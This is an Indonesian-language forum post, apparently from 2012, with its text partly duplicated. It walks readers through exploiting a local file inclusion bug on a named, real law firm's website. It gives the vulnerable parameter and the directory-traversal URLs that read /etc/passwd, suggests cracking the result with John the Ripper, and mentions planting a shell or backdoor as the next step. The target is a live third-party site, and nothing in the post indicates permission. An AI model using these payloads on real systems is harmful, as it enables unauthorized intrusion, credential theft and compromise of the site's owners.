03-21-2012, 01:14 AM
setelah lama gk bikin tread ane malam ini mau bikin tread atas nama penasaran dan kesalahan ane karna ada yg menanyakan apakah website ini vulnerable atau tidak. dan ternyata ada dan ane sudah sampai di /etc/passwd walau belum sempat untuk menanam backdoor dikarenakan di butuhkan perabaan file lagi dan besok hari ane UAS fisika dan Ipa wkwkwkwk
oke deh ane lupa tadi yg nannya om siapa yg jelas ini special untuk ente
muncul error kan?? , tapi belom muncul isi file dari /etc/passwd. eits sebelum itu jangan2 ada yg belom tau lagi macem isi dari /etc/passwd gimana . coba buka dulu di backtrack ente,
itu akan muncul isi dari file /etc/passwd yang nantinya bisa di crack dengan JTR bin John The Ripper
okeh lanjut error tersebut bisa dikatakan bug terdapat, tapi belom ketemu /etc/passwd nya, hmm sekarang coba kita mundur dengan
coba kita langsung ke /etc/passwd
tada!!
muncul deh isi /etc/passwd walaupun harus di exploit lanjut buat tanam shell nya.
disini ane hanya menunjukan ke peserta training tadi kalo web ini ada bug lfi nya
thank u
mohon maaf kalo tutorial nya cupu abis, apa lagi buat yg udah dewi bin dewo banget *sungkem* *tendang* *kaburr*
ane masih jauh dari kata pentester apa lagi hacker,
salam..
oke deh ane lupa tadi yg nannya om siapa yg jelas ini special untuk ente
Code:
bug nya terletak disini:
http://www.rechtsanwalt-bohle.de/index.php?tarcont=
Code:
kalo dikasih
http://www.rechtsanwalt-bohle.de/index.php?tarcont=./../../../../../etc/passwd
muncul error kan?? , tapi belom muncul isi file dari /etc/passwd. eits sebelum itu jangan2 ada yg belom tau lagi macem isi dari /etc/passwd gimana . coba buka dulu di backtrack ente,
Code:
cat /etc/passwd
itu akan muncul isi dari file /etc/passwd yang nantinya bisa di crack dengan JTR bin John The Ripper
okeh lanjut error tersebut bisa dikatakan bug terdapat, tapi belom ketemu /etc/passwd nya, hmm sekarang coba kita mundur dengan
Code:
../../../
coba kita langsung ke /etc/passwd
Code:
www.rechtsanwalt-bohle.de/index.php?tarcont=/etc/passwd
tada!!
muncul deh isi /etc/passwd walaupun harus di exploit lanjut buat tanam shell nya.
disini ane hanya menunjukan ke peserta training tadi kalo web ini ada bug lfi nya
thank u
Quote:curcol dikit, ane lagi keingetan mantan :|
mohon maaf kalo tutorial nya cupu abis, apa lagi buat yg udah dewi bin dewo banget *sungkem* *tendang* *kaburr*
ane masih jauh dari kata pentester apa lagi hacker,
salam..
[shcode=This_site_xss-ed]